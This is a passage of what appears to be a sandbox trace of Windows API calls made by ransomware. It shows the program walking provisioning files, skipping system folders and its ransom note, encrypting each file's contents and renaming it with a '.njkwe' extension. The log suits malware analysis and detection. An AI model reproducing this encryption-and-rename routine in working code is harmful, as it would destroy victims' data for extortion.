pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\110__Connections_Cellular_Claro (El Salvador)_i0$(__MVID)@WAP.provxml") returned 163 [0076.468] StrStrIW (lpFirst="110__Connections_Cellular_Claro (El Salvador)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0076.468] lstrcmpW (lpString1="110__Connections_Cellular_Claro (El Salvador)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.468] lstrcmpW (lpString1="110__Connections_Cellular_Claro (El Salvador)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0076.468] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\110__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.468] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\110__Connections_Cellular_Claro (El Salvador)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\110__connections_cellular_claro (el salvador)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0076.469] GetTickCount () returned 0x1153758 [0076.469] GetTickCount () returned 0x1153758 [0076.469] GetTickCount () returned 0x1153758 [0076.469] GetTickCount () returned 0x1153758 [0076.469] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0076.469] GetProcessHeap () returned 0xbe0000 [0076.469] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0076.469] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2c1, lpOverlapped=0x0) returned 1 [0076.472] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd3f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.473] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2c1, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2c1, lpOverlapped=0x0) returned 1 [0076.473] GetProcessHeap () returned 0xbe0000 [0076.473] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0076.473] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.473] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0076.473] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0076.473] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0076.473] CloseHandle (hObject=0x43c) returned 1 [0076.473] GetProcessHeap () returned 0xbe0000 [0076.473] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0076.473] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\110__Connections_Cellular_Claro (El Salvador)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 183 [0076.473] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\110__Connections_Cellular_Claro (El Salvador)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\110__connections_cellular_claro (el salvador)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\110__Connections_Cellular_Claro (El Salvador)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\110__connections_cellular_claro (el salvador)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0076.474] GetProcessHeap () returned 0xbe0000 [0076.474] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0076.474] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9048435b, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9048435b, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9048435b, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x290, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="111__Connections_Cellular_Claro (El Salvador)_i1$(__MVID)@WAP.provxml", cAlternateFileName="111__C~1.PRO")) returned 1 [0076.474] lstrcmpiW (lpString1="111__Connections_Cellular_Claro (El Salvador)_i1$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0076.474] lstrcmpiW (lpString1="111__Connections_Cellular_Claro (El Salvador)_i1$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0076.474] lstrcmpiW (lpString1="111__Connections_Cellular_Claro (El Salvador)_i1$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0076.474] lstrcmpiW (lpString1="111__Connections_Cellular_Claro (El Salvador)_i1$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0076.474] lstrcmpiW (lpString1="111__Connections_Cellular_Claro (El Salvador)_i1$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0076.474] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\111__Connections_Cellular_Claro (El Salvador)_i1$(__MVID)@WAP.provxml") returned 163 [0076.474] StrStrIW (lpFirst="111__Connections_Cellular_Claro (El Salvador)_i1$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0076.474] lstrcmpW (lpString1="111__Connections_Cellular_Claro (El Salvador)_i1$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.474] lstrcmpW (lpString1="111__Connections_Cellular_Claro (El Salvador)_i1$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0076.474] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\111__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.474] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\111__Connections_Cellular_Claro (El Salvador)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\111__connections_cellular_claro (el salvador)_i1$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0076.474] GetTickCount () returned 0x1153758 [0076.474] GetTickCount () returned 0x1153758 [0076.474] GetTickCount () returned 0x1153758 [0076.474] GetTickCount () returned 0x1153758 [0076.474] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0076.475] GetProcessHeap () returned 0xbe0000 [0076.475] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0076.475] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x290, lpOverlapped=0x0) returned 1 [0076.477] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.477] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x290, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x290, lpOverlapped=0x0) returned 1 [0076.478] GetProcessHeap () returned 0xbe0000 [0076.478] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0076.478] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.478] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0076.478] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0076.478] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0076.478] CloseHandle (hObject=0x43c) returned 1 [0076.478] GetProcessHeap () returned 0xbe0000 [0076.478] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0076.478] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\111__Connections_Cellular_Claro (El Salvador)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 183 [0076.478] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\111__Connections_Cellular_Claro (El Salvador)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\111__connections_cellular_claro (el salvador)_i1$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\111__Connections_Cellular_Claro (El Salvador)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\111__connections_cellular_claro (el salvador)_i1$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0076.479] GetProcessHeap () returned 0xbe0000 [0076.479] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0076.479] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x904aa5c6, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x904aa5c6, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x904aa5c6, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2db, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="112__Connections_Cellular_Telefonica (El Salvador)_i0$(__MVID)@WAP.provxml", cAlternateFileName="112__C~1.PRO")) returned 1 [0076.479] lstrcmpiW (lpString1="112__Connections_Cellular_Telefonica (El Salvador)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0076.479] lstrcmpiW (lpString1="112__Connections_Cellular_Telefonica (El Salvador)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0076.479] lstrcmpiW (lpString1="112__Connections_Cellular_Telefonica (El Salvador)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0076.479] lstrcmpiW (lpString1="112__Connections_Cellular_Telefonica (El Salvador)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0076.479] lstrcmpiW (lpString1="112__Connections_Cellular_Telefonica (El Salvador)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0076.479] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\112__Connections_Cellular_Telefonica (El Salvador)_i0$(__MVID)@WAP.provxml") returned 168 [0076.479] StrStrIW (lpFirst="112__Connections_Cellular_Telefonica (El Salvador)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0076.479] lstrcmpW (lpString1="112__Connections_Cellular_Telefonica (El Salvador)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.479] lstrcmpW (lpString1="112__Connections_Cellular_Telefonica (El Salvador)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0076.479] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\112__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.479] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\112__Connections_Cellular_Telefonica (El Salvador)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\112__connections_cellular_telefonica (el salvador)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0076.480] GetTickCount () returned 0x1153758 [0076.480] GetTickCount () returned 0x1153758 [0076.480] GetTickCount () returned 0x1153758 [0076.480] GetTickCount () returned 0x1153758 [0076.480] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0076.480] GetProcessHeap () returned 0xbe0000 [0076.480] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0076.480] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2db, lpOverlapped=0x0) returned 1 [0076.482] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd25, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.482] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2db, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2db, lpOverlapped=0x0) returned 1 [0076.482] GetProcessHeap () returned 0xbe0000 [0076.482] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0076.482] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.482] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0076.482] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0076.482] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0076.482] CloseHandle (hObject=0x43c) returned 1 [0076.483] GetProcessHeap () returned 0xbe0000 [0076.483] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0076.483] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\112__Connections_Cellular_Telefonica (El Salvador)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 188 [0076.483] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\112__Connections_Cellular_Telefonica (El Salvador)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\112__connections_cellular_telefonica (el salvador)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\112__Connections_Cellular_Telefonica (El Salvador)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\112__connections_cellular_telefonica (el salvador)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0076.484] GetProcessHeap () returned 0xbe0000 [0076.484] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0076.484] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x904aa5c6, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x904aa5c6, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x904aa5c6, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2cb, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="113__Connections_Cellular_TIGO (El Salvador)_i0$(__MVID)@WAP.provxml", cAlternateFileName="113__C~1.PRO")) returned 1 [0076.484] lstrcmpiW (lpString1="113__Connections_Cellular_TIGO (El Salvador)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0076.484] lstrcmpiW (lpString1="113__Connections_Cellular_TIGO (El Salvador)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0076.484] lstrcmpiW (lpString1="113__Connections_Cellular_TIGO (El Salvador)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0076.484] lstrcmpiW (lpString1="113__Connections_Cellular_TIGO (El Salvador)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0076.484] lstrcmpiW (lpString1="113__Connections_Cellular_TIGO (El Salvador)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0076.484] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\113__Connections_Cellular_TIGO (El Salvador)_i0$(__MVID)@WAP.provxml") returned 162 [0076.484] StrStrIW (lpFirst="113__Connections_Cellular_TIGO (El Salvador)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0076.484] lstrcmpW (lpString1="113__Connections_Cellular_TIGO (El Salvador)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.484] lstrcmpW (lpString1="113__Connections_Cellular_TIGO (El Salvador)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0076.484] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\113__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.484] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\113__Connections_Cellular_TIGO (El Salvador)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\113__connections_cellular_tigo (el salvador)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0076.484] GetTickCount () returned 0x1153768 [0076.484] GetTickCount () returned 0x1153768 [0076.484] GetTickCount () returned 0x1153768 [0076.484] GetTickCount () returned 0x1153768 [0076.484] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0076.485] GetProcessHeap () returned 0xbe0000 [0076.485] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0076.485] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2cb, lpOverlapped=0x0) returned 1 [0076.486] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd35, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.486] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2cb, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2cb, lpOverlapped=0x0) returned 1 [0076.486] GetProcessHeap () returned 0xbe0000 [0076.486] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0076.486] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.486] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0076.486] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0076.487] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0076.487] CloseHandle (hObject=0x43c) returned 1 [0076.487] GetProcessHeap () returned 0xbe0000 [0076.487] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0076.487] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\113__Connections_Cellular_TIGO (El Salvador)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 182 [0076.487] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\113__Connections_Cellular_TIGO (El Salvador)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\113__connections_cellular_tigo (el salvador)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\113__Connections_Cellular_TIGO (El Salvador)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\113__connections_cellular_tigo (el salvador)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0076.487] GetProcessHeap () returned 0xbe0000 [0076.488] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0076.488] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, 